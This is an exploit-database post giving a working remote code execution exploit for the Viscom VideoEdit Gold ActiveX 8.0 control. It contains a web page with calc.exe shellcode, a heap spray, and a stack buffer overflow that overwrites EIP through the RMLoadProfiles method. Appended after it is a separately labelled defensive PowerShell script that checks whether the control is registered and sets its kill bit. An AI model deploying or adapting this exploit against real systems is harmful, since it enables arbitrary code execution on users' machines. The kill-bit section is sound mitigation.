[local exploits] - Viscom VideoEdit Gold ActiveX 8.0 Remote
Posted on 06 December 2010
===============================================================
Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
===============================================================

<!--
Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Version: 8.0.0.0
Tested on: WinXP - IE 6
CVE: NA (0day)

Impact is relatively low because the object is not marked safe for scripting.
You'll need to change the default IE settings to let it run.

This is a plain vanilla stack overflow. The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"

I'm not using the SEH, but here are the offsets just for kicks if you're interested.

[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
-->

<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object>

<script>
// Ctrl+C Ctrl+V, herpderp
// calc.exe
var shellcode = unescape(
    '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);

// Heap spray: pad each block with NOPs so that 0x0c0c0c0c lands inside NOP sled + shellcode
var nops = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (nops.length < slackspace) { nops += nops; }
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
while ((block.length + slackspace) < 0x50000) { block = block + block + fillblock; }

memory = new Array();
for (counter = 0; counter < 200; counter++) {
    memory[counter] = block + shellcode;
}

// Stack overflow: 2311 bytes of filler, then saved EBP, then the return address
var bof = '';
while (bof.length < 2312) { bof += 'A'; }
bof += 'BBBB';               // EBP
bof += "\x0c\x0c\x0c\x0c";   // EIP

document.getElementById('target').RMLoadProfiles(bof);
</script>

# 1337db.com [2010-12-06]
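The advisory notes that the control is not marked safe for scripting, so a default IE configuration will not instantiate it from a web page; the standard mitigation for a registered control with a known memory-safety bug is to set its kill bit so that IE refuses to load it regardless of the user's zone settings. The following PowerShell script is an added example and is not part of the advisory or of Viscom's product: it reports whether the control's CLSID (taken from the page) is registered, whether its class registration declares the SafeForScripting / SafeForInitializing component categories, and whether the kill bit is present, and sets the bit if it is missing. The registry location and the 0x400 "Compatibility Flags" value are Microsoft's documented ActiveX Compatibility mechanism; the CATID GUIDs are the standard component-category identifiers. Setting the bit requires an elevated session.

```powershell
# Added example (not from the original advisory): inspect and kill-bit the
# VideoEdit Gold ActiveX control. CLSID comes from the advisory; the key path
# and 0x400 flag are Microsoft's documented ActiveX Compatibility mechanism.

$Clsid            = '{57D9AF4C-23BA-47EC-A40B-2DA79641B285}'
$KillBitFlag      = 0x400
$CompatKey        = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
$ClassKey         = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
$CatSafeScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$CatSafeInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForInitializing

function Test-ActiveXKillBit {
    # True only when the kill bit is present in Compatibility Flags.
    if (-not (Test-Path $CompatKey)) { return $false }
    $flags = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (([int]$flags -band $KillBitFlag) -eq $KillBitFlag)
}

function Get-ActiveXControlStatus {
    # Summarise registration, declared safety categories and kill-bit state.
    $inproc = $null
    if (Test-Path "$ClassKey\InprocServer32") {
        $inproc = (Get-ItemProperty "$ClassKey\InprocServer32").'(default)'
    }
    [PSCustomObject]@{
        Clsid               = $Clsid
        Registered          = Test-Path $ClassKey
        InprocServer        = $inproc
        SafeForScripting    = Test-Path "$ClassKey\Implemented Categories\$CatSafeScripting"
        SafeForInitializing = Test-Path "$ClassKey\Implemented Categories\$CatSafeInit"
        KillBitSet          = Test-ActiveXKillBit
    }
}

function Set-ActiveXKillBit {
    # OR the kill bit into any flags already present rather than overwriting them.
    if (-not (Test-Path $CompatKey)) { New-Item -Path $CompatKey -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
                   -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    Set-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
        -Value ([int]$existing -bor $KillBitFlag) -Type DWord
}

$status = Get-ActiveXControlStatus
$status | Format-List

if ($status.Registered -and -not $status.KillBitSet) {
    Write-Host "Control is registered without a kill bit; setting it."
    Set-ActiveXKillBit
    Get-ActiveXControlStatus | Format-List
}
```

On a machine matching the advisory, the report should show the control registered with neither safety category declared, which is why the author had to loosen IE's settings for the test; the kill bit closes the remaining gap for users who have done the same. The same `Test-ActiveXKillBit` check is also a useful line item in an endpoint audit, since a control can be re-registered by a reinstall while the kill bit persists independently of the class registration.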